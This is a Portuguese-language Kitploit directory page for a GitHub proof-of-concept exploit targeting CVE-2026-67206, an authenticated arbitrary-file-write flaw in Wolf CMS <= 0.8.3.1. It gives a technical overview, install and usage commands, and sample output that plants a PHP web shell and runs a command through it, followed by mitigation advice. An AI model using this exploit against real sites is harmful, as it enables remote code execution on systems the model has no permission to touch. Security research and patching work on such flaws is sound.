Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-67206 — Exploit de PoC para Wolf CMS <= 0.8.3.1: autentica-se no Admin, grava um arquivo PHP arbitrário em /public via FileManagerController e executa comandos através de um web shell. | Kitploit
Ferramentas/GitHubGitHub/anirbala98/cve-2026-67206
ExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubanirbala98/cve-2026-67206

CVE-2026-67206

Exploit de PoC para Wolf CMS <= 0.8.3.1: autentica-se no Admin, grava um arquivo PHP arbitrário em /public via FileManagerController e executa comandos através de um web shell.

Ver Repositório
13há 21 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-67206 - Wolf CMS <= 0.8.3.1 - RCE via Escrita Arbitrária de Arquivos

Este repositório contém um exploit de Prova de Conceito (PoC) para a CVE-2026-67206

Aviso Legal

Este projeto é fornecido apenas para fins educacionais e testes de segurança autorizados. Não o utilize contra sistemas que você não possui ou para os quais não tem permissão de testar.

Visão Geral

Existe uma vulnerabilidade de escrita arbitrária de arquivos nas versões do Wolf CMS até a 0.8.3.1. Ela permite que um atacante autenticado escreva arquivos arbitrários maliciosos no diretório /public da raiz da web por meio das funções create_file() e save() do FileManagerController.php. A função create_file() do FileManagerController.php não valida extensões de arquivo, permitindo assim que atacantes autenticados escrevam scripts PHP maliciosos e obtenham privilégios de execução remota de código.

Um artigo detalhado com análise de código-fonte e demonstração do exploit pode ser encontrado no meu blog Medium.

Versão Afetada

Todas as versões do Wolf CMS até a 0.8.3.1 são afetadas. O repositório do Wolf CMS foi arquivado em 28 de agosto de 2021 e não é mais mantido ativamente. Atualmente não existem patches para esta vulnerabilidade.

Requisitos

  • Python 3.13.14
  • Requests 2.32.5
  • Beautifulsoup4 4.15.0

Instalação

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt

Uso

root@kitploit:~
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin

Exemplo

root@kitploit:~
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K 
[*] Logging in with provided credentials...
[+] Login successful

[*] Creating a file named shell.php...
[+] File creation successful

[*] Attempting to write payload to shell.php...
[+] Payload written successfully!
[+] Web shell can be accessed with 'cmd' query string at http://127.0.0.1:8080/public/shell.php
[+] Testing output of http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data

Mitigação

  • Valide as extensões dos arquivos criados por usuários autenticados com base em uma lista de permissões
  • Não permita extensões como .php, .phtml, .phar, .php5 etc., a menos que seja estritamente necessário
  • Não permita a execução de PHP em diretórios de upload da raiz do servidor web
  • Salve os arquivos criados em um servidor diferente, se possível, para minimizar o impacto

Referências

  • https://www.tenable.com/cve/CVE-2026-67206
  • https://github.com/Caycon/cve-advisories/blob/main/2026/WolfCms/CVE-2026-67206.md
  • https://anirbala98.medium.com/from-source-code-to-exploit-understanding-cve-2026-67206-0ad3ae08bc78
Baixar ferramenta